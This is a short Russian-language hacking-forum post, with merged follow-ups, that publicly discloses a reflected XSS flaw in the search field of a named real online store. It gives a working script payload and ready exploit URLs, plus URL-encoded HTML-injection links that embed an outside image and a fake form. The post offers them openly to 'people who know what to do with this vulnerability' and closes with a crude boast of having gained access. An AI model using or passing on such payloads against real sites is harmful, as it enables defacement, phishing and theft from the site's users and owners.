Вчера нашел XSS уязвимость на сайте https://www.taburetka.ua Payload: "><svg onload=alert(document.body.innerHTML="")// Вставлять в поисковую строку или на прямую https://www.taburetka.ua/poisk?q= Пример https://www.taburetka.ua/poisk?q="><svg onload=alert(document.body.innerHTML="")// Тему оформлять красиво не стал, так как нет надобности в этом, и так все понятно. Слив для людей, которые знают, что с этой уязвимостей делать. Может кому-то подойдет, чтобы потренероваться
бля лолз сломал, щп The post was merged to previous Aug 13, 2022 https://www.taburetka.ua/poisk?q=%3C%2Fh1%3E%27%3Cdiv%3E%3C%2Fh1%3E%22%3Cimg%20src%3D%27https%3A%2F%2Fslivshkur.net%2Fuploads%2Fposts%2F2019-05%2F1559316149_30.jpg%27%3E%22%3Ch1%27%27%3C%2Fdiv%3E The post was merged to previous Aug 13, 2022 https://www.taburetka.ua/poisk?q=%3C%2Fh1%3E%27%3Cdiv%3E%3C%2Fh1%3E%22%3Cimg%20src%3D%27https%3A%2F%2Fslivshkur.net%2Fuploads%2Fposts%2F2019-05%2F1559316149_30.jpg%27%3E%3Cform%20name%3D%22calc%22%3E%3Cinput%20type%3D%22text%22%20name%3D%22input%22%3E%3Cinput%20type%3D%22button%22%20value%3D%221%22%20OnClick%3D%22calc.input.value%20%3D%20%271%27%22%3E%3C%2Fform%3E%22%3Ch1%27%27%3Cdiv%3E The post was merged to previous Aug 13, 2022 Суки доступ получил, они отъеъебнули сайт